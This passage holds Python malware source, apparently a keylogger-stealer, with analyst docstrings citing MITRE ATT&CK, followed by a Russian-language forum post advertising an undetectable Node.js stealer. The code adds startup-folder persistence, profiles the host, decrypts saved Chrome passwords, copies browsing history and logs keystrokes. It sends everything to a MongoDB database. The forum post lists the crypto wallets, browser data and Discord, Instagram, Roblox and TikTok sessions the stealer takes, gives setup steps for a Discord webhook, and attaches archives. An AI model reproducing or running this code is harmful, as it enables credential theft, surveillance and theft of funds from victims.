    startup_path = os.path.join(os.environ["USERPROFILE"], "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
    if not os.path.exists(os.path.join(startup_path, current_file)):
        shutil.copy2(current_path, startup_path)
        print("Script copied to startup folder successfully!")
    else:
        print("Script already in startup folder.")

#computer information and network
def recon():
    db = cluster["keyloger"]
    collection = db["devices"]
    computer_name = platform.node()
    os = platform.system()
    os_version = platform.release()
    c = wmi.WMI()
    for cpu in c.Win32_Processor():
        print(f'CPU Name: {cpu.Name}')
    for gpu in c.Win32_VideoController():
        print(f'GPU Name: {gpu.Name}')
    for disk in c.Win32_DiskDrive():
        print(f'Disk Name: {disk.Caption}')
        total_space = int(disk.Size)
    ram = psutil.virtual_memory()
    print(f'Total RAM: {ram.total / (1024 ** 3):.2f} GB')
    response = requests.get("https://api.ipify.org")
    public_ip = response.text
    ip_info = requests.get(f"https://ipapi.co/{public_ip}/json/").json()
    country = ip_info['country_name']
    city = ip_info["city"]
    organization = ip_info["org"]
    post = {"Device": computer_name, "Operating system": os+" "+os_version, "Cpu": cpu.Name, "Gpu": gpu.Name, "Drive name": disk.Caption, "Drive size": f'{total_space / (1024 ** 3):.2f} GB', "Ram": f'{ram.total / (1024 ** 3):.2f} GB', "Public ip": public_ip, "Country": country, "City": city, "Provider": organization}
    collection.insert_one(post)

#password extractor
def fetching_encryption_key():
    """Return the unwrapped key stored in Chrome's "Local State" file.

    Analyst note: part of browser credential theft (MITRE ATT&CK
    T1555.003). The function reads the JSON file "Local State" from the
    current user's Chrome profile directory, base64-decodes the value at
    os_crypt.encrypted_key, discards the first five bytes and passes the
    remainder to CryptUnprotectData (DPAPI). The call is made in the
    context of the logged-on user, so no elevation is involved. A read of
    "Local State" by a process other than the browser is the detection
    point for this step.
    """
    local_computer_directory_path = os.path.join(
      os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
      "User Data", "Local State")
   
    with open(local_computer_directory_path, "r", encoding="utf-8") as f:
        local_state_data = f.read()
        local_state_data = json.loads(local_state_data)
 
    encryption_key = base64.b64decode(local_state_data["os_crypt"]["encrypted_key"])
   
    # Drop a 5-byte prefix (presumably Chrome's "DPAPI" tag - confirm).
    encryption_key = encryption_key[5:]
 
    # Element [1] of the returned tuple is the decrypted data.
    return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
 
 
def password_decryption(password, encryption_key):
    """Decrypt one stored password blob; return a string.

    Analyst note: two paths are tried. First the blob is treated as
    AES-GCM data: bytes 3..14 are used as the nonce, the rest as
    ciphertext, and the final 16 bytes of the output are sliced off
    (the code calls decrypt(), not decrypt_and_verify(), so the tag is
    not checked). On any exception the raw blob is handed to
    CryptUnprotectData instead. If both fail, the literal string
    "No Passwords" is returned. Both except clauses are bare, so every
    error is swallowed silently.

    Args:
        password: encrypted value from the "password_value" column
            (assumed bytes - confirm against caller).
        encryption_key: key returned by fetching_encryption_key().
    """
    try:
        iv = password[3:15]
        password = password[15:]
       
        cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
       
        return cipher.decrypt(password)[:-16].decode()
    except:
       
        try:
            # Fallback: direct DPAPI unprotect; result is str() of the bytes.
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return "No Passwords"
 
 
def main() -> None:
    """Extract saved Chrome logins and upload them to MongoDB.

    Analyst note: credential theft from a web browser (MITRE ATT&CK
    T1555.003). The function copies Chrome's "Login Data" SQLite file to
    "ChromePasswords.db" in the current working directory, reads the
    `logins` table, decrypts each password_value and inserts one document
    per row into the "devices_passwords_logins" collection, then deletes
    the temporary copy. Detection points: a non-browser process reading
    "Login Data", and the short-lived "ChromePasswords.db" file. Any
    credential reachable by this routine should be treated as compromised
    and rotated during response.
    """
    print("Extracting passwords")
    db = cluster["keyloger"]
    collection = db["devices_passwords_logins"]
 
    key = fetching_encryption_key()
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Google", "Chrome", "User Data", "default", "Login Data")
    filename = "ChromePasswords.db"
    # Work on a copy of the database rather than the live file.
    shutil.copyfile(db_path, filename)
   
    # NOTE: `db` is rebound here from the MongoDB database to the SQLite
    # connection; `collection` was captured before the rebind.
    db = sqlite3.connect(filename)
    cursor = db.cursor()
   
    cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
    "order by date_last_used")
   
    for row in cursor.fetchall():
        # row[1] is action_url; origin_url (row[0]) is selected but unused.
        login_page_url = row[1]
        user_name = row[2]
        decrypted_password = password_decryption(row[3], key)
        # The two date columns are read but never used afterwards.
        date_of_creation = row[4]
        last_usuage = row[5]
       
        # Upload when either a user name or a decrypted value is present.
        if user_name or decrypted_password:
            post = {"login Url":login_page_url, "Username": user_name, "Password":decrypted_password}
            collection.insert_one(post)
       
        else:
            continue
    cursor.close()
    db.close()
   
    # Best-effort removal of the temporary copy; failures are ignored.
    try:
        os.remove(filename)
    except:
        pass

#history extractor
def user_history_data() -> None:
    """Upload every row of Chrome's `urls` history table to MongoDB.

    Analyst note: browser information discovery (MITRE ATT&CK T1217).
    The function changes the working directory to the user's Chrome
    "Default" profile, opens the "History" SQLite file in place and
    inserts one document per row into the "devices_history" collection.
    The SQLite connection is not closed in this function. Detection
    point: a non-browser process opening the "History" file.
    """
    print("Extracting history data")
    db = cluster["keyloger"]
    collection = db["devices_history"]

    path = r"\AppData\Local\Google\Chrome\User Data\Default"

    # Side effect: the process working directory changes for all later code.
    os.chdir(os.path.join(os.environ["USERPROFILE"] + path))
    con = sqlite3.connect("History")
    cursor = con.cursor()

    for i in cursor.execute("SELECT * from urls"):
        # Column 1 is stored as the URL and column 2 as the page name.
        post = {"website name": i[2], "website url": i[1]}
        collection.insert_one(post)
    print("Running keyloger")

#keylogs
# Analyst note: in-memory buffer of captured key events; on_press() appends to
# it and resets it after each upload. Captured input exists only in process
# memory until Enter is pressed.
keys = []

def on_press(key):
    """pynput key-press callback: buffer keys, upload a line on Enter.

    Analyst note: keylogging (MITRE ATT&CK T1056.001). Every key event is
    appended to the module-level `keys` list. When Enter is pressed the
    list is flattened to text with a chain of str.replace() calls and
    inserted into the "devices" collection together with `host_name`,
    after which the buffer is cleared. `host_name` is declared global
    here but is not assigned anywhere in the visible part of the file.
    Detection points: a script process installing a global keyboard hook
    and issuing a database write after each Enter key.
    """
    global keys, host_name
    db = cluster["keyloger"]
    collection = db["devices"]
    keys.append(key)
    if key == Key.enter:
        # Strip list/repr punctuation and selected special-key markers.
        data = str(keys).replace("'","").replace(",","").replace("[","").replace("]","").replace("<Key.space:  >"," ").replace("<Key.enter: <13>>","").replace("<Key.shift: <160>>", "")
        post = {"device": str(host_name), "text log": data}
        collection.insert_one(post)
        keys = []

def on_release(key):
    """pynput key-release callback: stop the listener when Esc is released.

    Returning False from a pynput callback stops the listener; for any
    other key the function returns None and listening continues.
    """
    if key == keyboard.Key.esc:
        return False

#calling malware functions
# Analyst note: execution order of the sample at import/run time -
# persistence, host profiling, credential extraction, history extraction,
# then keylogging. Each stage writes to the MongoDB handle defined above, so
# the stages appear as a burst of file reads in the Chrome profile followed by
# database traffic, which is useful for correlating telemetry.
copy_to_startup()
recon()
main()
user_history_data()
# join() blocks here until the listener stops (on_release returns False on Esc).
with keyboard.Listener(on_press=on_press,on_release=on_release) as listener:
    listener.join()
# A second listener is then created and started without being joined.
listener = keyboard.Listener(on_press=on_press,on_release=on_release)
listener.start()

Fewer Stealer FUD 0/66 с обфускацией и отправкой через discord webhook, построен на NodeJS https://nodejs.org/

  • Binance, Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi
  • Trust, Metamask, BinanceChain, Phantom, TronLink, Ronin, Exodus, Coin98, Authenticator, MathWallet, YoroiWallet, GuardaWallet, JaxxxLiberty, Wombat, EVERWallet, KardiaChain, XDEFI, Nami, TerraStation, MartianAptos, TON, Keplr, CryptoCom, PetraAptos, OKX, Sollet, Sender, Sui, SuietSui, Braavos, FewchaMove, EthosSui, ArgentX, NiftyWallet, BraveWallet, EqualWallet, BitAppWallet, iWallet, AtomicWallet, MewCx, GuildWallet, SaturnWallet, HarmonyWallet, PaliWallet, BoltX, LiqualityWallet, MaiarDeFiWallet, TempleWallet, Metamask_Edge, Ronin_Edge, Yoroi_Edge, Authenticator_Edge, MetaMask_Opera
  • Chrome, Edge, Brave, Opera, OperaGX, OperaNeon, Yandex
  • Password / Cookie
  • Discord Token Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Instagram Session stealer & validator
  • Roblox Session stealer & validator
  • Tiktok Session stealer & validator
  • Telegram
Скачайте подходящую вам иконку icon.ico
Вставьте вебхук в 32932.js ==> const webhook3939 = "YOUR_DISCORD_WEBHOOK_PUT_HERE"
Запустите install.bat




 

Вложения

  • SATANKLGR.zip
    17.8 КБ · Просмотры: 12
  • angst-rewrite.zip
    9.6 КБ · Просмотры: 14